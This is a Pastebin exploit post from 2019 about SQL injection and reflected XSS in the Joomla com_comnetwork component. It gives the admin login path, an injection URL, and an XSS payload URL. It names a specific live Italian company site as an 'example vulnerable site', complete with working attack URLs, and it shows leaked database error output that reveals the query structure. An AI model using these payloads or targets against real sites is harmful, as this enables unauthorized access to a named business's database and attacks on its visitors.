KingSkrupellos

PSPCommunication Caldaie D'Alessandro Com_Comnetwork XSS SQL

Aug 23rd, 2019
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.21 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : PSPCommunication Caldaie D'Alessandro Com_Comnetwork XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 24/08/2019
  7. # Vendor Homepage : pspcommunication.it - caldaiedalessandro.it
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ###################################################################
  20.  
  21. # Impact :
  22. ***********
  23. PSPCommunication Caldaie D'Alessandro Com_Comnetwork is prone to an SQL-injection
  24. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  25. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  26. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  27. A remote attacker can send a specially crafted request to the vulnerable application and
  28. execute arbitrary SQL commands in application`s database. Further exploitation of this
  29. vulnerability may result in unauthorized data manipulation.
  30. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  31.  
  32. Reflected XSS (or Non-Persistent) :
  33. ***************************************
  34. The server reads data directly from the HTTP
  35. request and reflects it back in the HTTP response. Reflected XSS exploits occur when an
  36. attacker causes a victim to supply dangerous content to a vulnerable web application,
  37. which is then reflected back to the victim and executed by the web browser. The most common
  38. mechanism for delivering malicious content is to include it as a parameter in a URL that is
  39. posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute
  40. the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
  41. that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
  42. the content is executed by the victim's browser.
  43.  
  44. ###################################################################
  45.  
  46. Admin Panel Login Path :
  47. **********************
  48. /ita/index.php?option=com_user&view=login&Itemid=60&lang=en
  49.  
  50. # SQL Injection Exploit :
  51. **********************
  52. /ita/index.php?view=category&catid=21%3Aestero&id=21&option=
  53. com_comnetwork&Itemid=42&lang=en&filters[0]=Europa&filters[1]=
  54. Espa%C3%B1a&filters[2]=---&filters[3]=[SQL Injection]
  55.  
  56. # Cross Site Scripting XSS Exploit :
  57. ********************************
  58. /ita/index.php?view=category&catid=21%3Aestero&id=
  59. 21&option=com_comnetwork&Itemid=42&lang=en&filters[0]=Europa&filters[1]=
  60. Espa%C3%B1a&filters[2]=---&filters[3]=1%27%3Cmarquee%3E%3Cfont%20color=
  61. lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  62.  
  63. ###################################################################
  64.  
  65. # Example Vulnerable Sites :
  66. *************************
  67. [+] caldaiedalessandro.it/ita/index.php?view=category&catid=21%3Aestero&id=21
  68. &option=com_comnetwork&Itemid=42&lang=en&filters[0]=Europa&filters
  69. [1]=Espa%C3%B1a&filters[2]=---&filters[3]=1%27
  70.  
  71. [+] caldaiedalessandro.it/ita/index.php?view=category&catid=21%3Aestero&id=
  72. 21&option=com_comnetwork&Itemid=42&lang=en&filters[0]=Europa&filters[1]=
  73. Espa%C3%B1a&filters[2]=---&filters[3]=1%27%3Cmarquee%3E%3Cfont%20color=
  74. lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  75.  
  76. ###################################################################
  77.  
  78. # Example SQL Database Error :
  79. ****************************
  80. No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your
  81. MySQL server version for the right syntax to use near ''1'' GROUP BY ORDER BY LIMIT 0, 20' at line 1
  82. SQL=SELECT * FROM jos_comnetwork WHERE catid = 21 AND published = 1 AND continent =
  83. 'Europa' AND state = 'España' AND region = '---' AND name = '1'' GROUP BY ORDER BY LIMIT 0, 20
  84. No valid database connection You have an error in your SQL syntax; check the manual that
  85. corresponds to your MySQL server version for the right syntax to use near ''1'' GROUP BY ORDER BY'
  86. at line 1 SQL=SELECT * FROM jos_comnetwork WHERE catid = 21 AND published = 1 AND continent =
  87. 'Europa' AND state = 'España' AND region = '---' AND name = '1'' GROUP BY ORDER BY
  88. No valid database connection You have an error in your SQL syntax; check the manual that corresponds
  89. to your MySQL server version for the right syntax to use near ''1'' GROUP BY ORDER BY' at line 1
  90. SQL=SELECT * FROM jos_comnetwork WHERE catid = 21 AND published = 1 AND continent =
  91. 'Europa' AND state = 'España' AND region = '---' AND name = '1'' GROUP BY ORDER BY
  92.  
  93. ###################################################################
  94.  
  95. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  96.  
  97. ###################################################################
Add Comment
Please, Sign In to add comment